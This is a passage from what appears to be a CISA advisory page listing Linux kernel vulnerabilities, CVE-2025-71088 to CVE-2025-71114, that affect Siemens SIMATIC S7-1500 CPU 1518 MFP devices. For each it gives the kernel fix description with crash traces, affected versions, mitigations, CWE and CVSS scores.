<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71088</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mptcp: fallback earlier on simult connection Syzkaller reports a simult-connect race leading to inconsistent fallback status: WARNING: CPU: 3 PID: 33 at net/mptcp/subflow.c:1515 subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515 Modules linked in: CPU: 3 UID: 0 PID: 33 Comm: ksoftirqd/3 Not tainted syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 RIP: 0010:subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515 Code: 89 ee e8 78 61 3c f6 40 84 ed 75 21 e8 8e 66 3c f6 44 89 fe bf 07 00 00 00 e8 c1 61 3c f6 41 83 ff 07 74 09 e8 76 66 3c f6 90 &lt;0f&gt; 0b 90 e8 6d 66 3c f6 48 89 df e8 e5 ad ff ff 31 ff 89 c5 89 c6 RSP: 0018:ffffc900006cf338 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff888031acd100 RCX: ffffffff8b7f2abf RDX: ffff88801e6ea440 RSI: ffffffff8b7f2aca RDI: 0000000000000005 RBP: 0000000000000000 R08: 0000000000000005 R09: 0000000000000007 R10: 0000000000000004 R11: 0000000000002c10 R12: ffff88802ba69900 R13: 1ffff920000d9e67 R14: ffff888046f81800 R15: 0000000000000004 FS: 0000000000000000(0000) GS:ffff8880d69bc000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000560fc0ca1670 CR3: 0000000032c3a000 CR4: 0000000000352ef0 Call Trace: tcp_data_queue+0x13b0/0x4f90 net/ipv4/tcp_input.c:5197 tcp_rcv_state_process+0xfdf/0x4ec0 net/ipv4/tcp_input.c:6922 tcp_v6_do_rcv+0x492/0x1740 net/ipv6/tcp_ipv6.c:1672 tcp_v6_rcv+0x2976/0x41e0 net/ipv6/tcp_ipv6.c:1918 ip6_protocol_deliver_rcu+0x188/0x1520 net/ipv6/ip6_input.c:438 ip6_input_finish+0x1e4/0x4b0 net/ipv6/ip6_input.c:489 NF_HOOK include/linux/netfilter.h:318 [inline] NF_HOOK include/linux/netfilter.h:312 [inline] ip6_input+0x105/0x2f0 net/ipv6/ip6_input.c:500 dst_input include/net/dst.h:471 [inline] ip6_rcv_finish net/ipv6/ip6_input.c:79 [inline] NF_HOOK include/linux/netfilter.h:318 [inline] NF_HOOK include/linux/netfilter.h:312 [inline] ipv6_rcv+0x264/0x650 net/ipv6/ip6_input.c:311 __netif_receive_skb_one_core+0x12d/0x1e0 net/core/dev.c:5979 __netif_receive_skb+0x1d/0x160 net/core/dev.c:6092 process_backlog+0x442/0x15e0 net/core/dev.c:6444 __napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7494 napi_poll net/core/dev.c:7557 [inline] net_rx_action+0xa9f/0xfe0 net/core/dev.c:7684 handle_softirqs+0x216/0x8e0 kernel/softirq.c:579 run_ksoftirqd kernel/softirq.c:968 [inline] run_ksoftirqd+0x3a/0x60 kernel/softirq.c:960 smpboot_thread_fn+0x3f7/0xae0 kernel/smpboot.c:160 kthread+0x3c2/0x780 kernel/kthread.c:463 ret_from_fork+0x5d7/0x6f0 arch/x86/kernel/process.c:148 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 The TCP subflow can process the simult-connect syn-ack packet after transitioning to TCP_FIN1 state, bypassing the MPTCP fallback check, as the sk_state_change() callback is not invoked for * -&gt; FIN_WAIT1 transitions. That will move the msk socket to an inconsistent status and the next incoming data will hit the reported splat. Close the race moving the simult-fallback check at the earliest possible stage - that is at syn-ack generation time. About the fixes tags: [2] was supposed to also fix this issue introduced by [3]. [1] is required as a dependence: it was not explicitly marked as a fix, but it is one and it has already been backported before [3]. In other words, this commit should be backported up to [3], including [2] and [1] if that's not already there.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71088">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/366.html">CWE-366 Race Condition within a Thread</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71095</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: stmmac: fix the crash issue for zero copy XDP_TX action There is a crash issue when running zero copy XDP_TX action, the crash log is shown below. [ 216.122464] Unable to handle kernel paging request at virtual address fffeffff80000000 [ 216.187524] Internal error: Oops: 0000000096000144 [#1] SMP [ 216.301694] Call trace: [ 216.304130] dcache_clean_poc+0x20/0x38 (P) [ 216.308308] __dma_sync_single_for_device+0x1bc/0x1e0 [ 216.313351] stmmac_xdp_xmit_xdpf+0x354/0x400 [ 216.317701] __stmmac_xdp_run_prog+0x164/0x368 [ 216.322139] stmmac_napi_poll_rxtx+0xba8/0xf00 [ 216.326576] __napi_poll+0x40/0x218 [ 216.408054] Kernel panic - not syncing: Oops: Fatal exception in interrupt For XDP_TX action, the xdp_buff is converted to xdp_frame by xdp_convert_buff_to_frame(). The memory type of the resulting xdp_frame depends on the memory type of the xdp_buff. For page pool based xdp_buff it produces xdp_frame with memory type MEM_TYPE_PAGE_POOL. For zero copy XSK pool based xdp_buff it produces xdp_frame with memory type MEM_TYPE_PAGE_ORDER0. However, stmmac_xdp_xmit_back() does not check the memory type and always uses the page pool type, this leads to invalid mappings and causes the crash. Therefore, check the xdp_buff memory type in stmmac_xdp_xmit_back() to fix this issue.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71095">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71097</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ipv4: Fix reference count leak when using error routes with nexthop objects When a nexthop object is deleted, it is marked as dead and then fib_table_flush() is called to flush all the routes that are using the dead nexthop. The current logic in fib_table_flush() is to only flush error routes (e.g., blackhole) when it is called as part of network namespace dismantle (i.e., with flush_all=true). Therefore, error routes are not flushed when their nexthop object is deleted: # ip link add name dummy1 up type dummy # ip nexthop add id 1 dev dummy1 # ip route add 198.51.100.1/32 nhid 1 # ip route add blackhole 198.51.100.2/32 nhid 1 # ip nexthop del id 1 # ip route show blackhole 198.51.100.2 nhid 1 dev dummy1 As such, they keep holding a reference on the nexthop object which in turn holds a reference on the nexthop device, resulting in a reference count leak: # ip link del dev dummy1 [ 70.516258] unregister_netdevice: waiting for dummy1 to become free. Usage count = 2 Fix by flushing error routes when their nexthop is marked as dead. IPv6 does not suffer from this problem.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71097">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/772.html">CWE-772 Missing Release of Resource after Effective Lifetime</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71098</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ip6_gre: make ip6gre_header() robust Over the years, syzbot found many ways to crash the kernel in ip6gre_header() [1]. This involves team or bonding drivers ability to dynamically change their dev-&gt;needed_headroom and/or dev-&gt;hard_header_len In this particular crash mld_newpack() allocated an skb with a too small reserve/headroom, and by the time mld_sendpack() was called, syzbot managed to attach an ip6gre device. [1] skbuff: skb_under_panic: text:ffffffff8a1d69a8 len:136 put:40 head:ffff888059bc7000 data:ffff888059bc6fe8 tail:0x70 end:0x6c0 dev:team0 ------------[ cut here ]------------ kernel BUG at net/core/skbuff.c:213 ! skb_under_panic net/core/skbuff.c:223 [inline] skb_push+0xc3/0xe0 net/core/skbuff.c:2641 ip6gre_header+0xc8/0x790 net/ipv6/ip6_gre.c:1371 dev_hard_header include/linux/netdevice.h:3436 [inline] neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618 neigh_output include/net/neighbour.h:556 [inline] ip6_finish_output2+0xfb3/0x1480 net/ipv6/ip6_output.c:136 __ip6_finish_output net/ipv6/ip6_output.c:-1 [inline] ip6_finish_output+0x234/0x7d0 net/ipv6/ip6_output.c:220 NF_HOOK_COND include/linux/netfilter.h:307 [inline] ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247 NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318 mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855 mld_send_cr net/ipv6/mcast.c:2154 [inline] mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71098">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.2</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71104</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: KVM: x86: Fix VM hard lockup after prolonged inactivity with periodic HV timer When advancing the target expiration for the guest's APIC timer in periodic mode, set the expiration to "now" if the target expiration is in the past (similar to what is done in update_target_expiration()). Blindly adding the period to the previous target expiration can result in KVM generating a practically unbounded number of hrtimer IRQs due to programming an expired timer over and over. In extreme scenarios, e.g. if userspace pauses/suspends a VM for an extended duration, this can even cause hard lockups in the host. Currently, the bug only affects Intel CPUs when using the hypervisor timer (HV timer), a.k.a. the VMX preemption timer. Unlike the software timer, a.k.a. hrtimer, which KVM keeps running even on exits to userspace, the HV timer only runs while the guest is active. As a result, if the vCPU does not run for an extended duration, there will be a huge gap between the target expiration and the current time the vCPU resumes running. Because the target expiration is incremented by only one period on each timer expiration, this leads to a series of timer expirations occurring rapidly after the vCPU/VM resumes. More critically, when the vCPU first triggers a periodic HV timer expiration after resuming, advancing the expiration by only one period will result in a target expiration in the past. As a result, the delta may be calculated as a negative value. When the delta is converted into an absolute value (tscdeadline is an unsigned u64), the resulting value can overflow what the HV timer is capable of programming. I.e. the large value will exceed the VMX Preemption Timer's maximum bit width of cpu_preemption_timer_multi + 32, and thus cause KVM to switch from the HV timer to the software timer (hrtimers). After switching to the software timer, periodic timer expiration callbacks may be executed consecutively within a single clock interrupt handler, because hrtimers honors KVM's request for an expiration in the past and immediately re-invokes KVM's callback after reprogramming. And because the interrupt handler runs with IRQs disabled, restarting KVM's hrtimer over and over until the target expiration is advanced to "now" can result in a hard lockup. E.g. the following hard lockup was triggered in the host when running a Windows VM (only relevant because it used the APIC timer in periodic mode) after resuming the VM from a long suspend (in the host). NMI watchdog: Watchdog detected hard LOCKUP on cpu 45 ... RIP: 0010:advance_periodic_target_expiration+0x4d/0x80 [kvm] ... RSP: 0018:ff4f88f5d98d8ef0 EFLAGS: 00000046 RAX: fff0103f91be678e RBX: fff0103f91be678e RCX: 00843a7d9e127bcc RDX: 0000000000000002 RSI: 0052ca4003697505 RDI: ff440d5bfbdbd500 RBP: ff440d5956f99200 R08: ff2ff2a42deb6a84 R09: 000000000002a6c0 R10: 0122d794016332b3 R11: 0000000000000000 R12: ff440db1af39cfc0 R13: ff440db1af39cfc0 R14: ffffffffc0d4a560 R15: ff440db1af39d0f8 FS: 00007f04a6ffd700(0000) GS:ff440db1af380000(0000) knlGS:000000e38a3b8000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000000d5651feff8 CR3: 000000684e038002 CR4: 0000000000773ee0 PKRU: 55555554 Call Trace: apic_timer_fn+0x31/0x50 [kvm] __hrtimer_run_queues+0x100/0x280 hrtimer_interrupt+0x100/0x210 ? ttwu_do_wakeup+0x19/0x160 smp_apic_timer_interrupt+0x6a/0x130 apic_timer_interrupt+0xf/0x20 Moreover, if the suspend duration of the virtual machine is not long enough to trigger a hard lockup in this scenario, since commit 98c25ead5eda ("KVM: VMX: Move preemption timer &lt;=&gt; hrtimer dance to common x86"), KVM will continue using the software timer until the guest reprograms the APIC timer in some way. Since the periodic timer does not require frequent APIC timer register programming, the guest may continue to use the software timer in ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71104">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/681.html">CWE-681 Incorrect Conversion between Numeric Types</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71112</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: hns3: add VLAN id validation before using Currently, the VLAN id may be used without validation when receive a VLAN configuration mailbox from VF. The length of vlan_del_fail_bmap is BITS_TO_LONGS(VLAN_N_VID). It may cause out-of-bounds memory access once the VLAN id is bigger than or equal to VLAN_N_VID. Therefore, VLAN id needs to be checked to ensure it is within the range of VLAN_N_VID.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71112">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71113</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: crypto: af_alg - zero initialize memory allocated via sock_kmalloc Several crypto user API contexts and requests allocated with sock_kmalloc() were left uninitialized, relying on callers to set fields explicitly. This resulted in the use of uninitialized data in certain error paths or when new fields are added in the future. The ACVP patches also contain two user-space interface files: algif_kpp.c and algif_akcipher.c. These too rely on proper initialization of their context structures. A particular issue has been observed with the newly added 'inflight' variable introduced in af_alg_ctx by commit: 67b164a871af ("crypto: af_alg - Disallow multiple in-flight AIO requests") Because the context is not memset to zero after allocation, the inflight variable has contained garbage values. As a result, af_alg_alloc_areq() has incorrectly returned -EBUSY randomly when the garbage value was interpreted as true: https://github.com/gregkh/linux/blame/master/crypto/af_alg.c#L1209 The check directly tests ctx-&gt;inflight without explicitly comparing against true/false. Since inflight is only ever set to true or false later, an uninitialized value has triggered -EBUSY failures. Zero-initializing memory allocated with sock_kmalloc() ensures inflight and other fields start in a known state, removing random issues caused by uninitialized data.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71113">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71114</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: via_wdt: fix critical boot hang due to unnamed resource allocation The VIA watchdog driver uses allocate_resource() to reserve a MMIO region for the watchdog control register. However, the allocated resource was not given a name, which causes the kernel resource tree to contain an entry marked as "" under /proc/iomem on x86 platforms. During boot, this unnamed resource can lead to a critical hang because subsequent resource lookups and conflict checks fail to handle the invalid entry properly.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71114">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
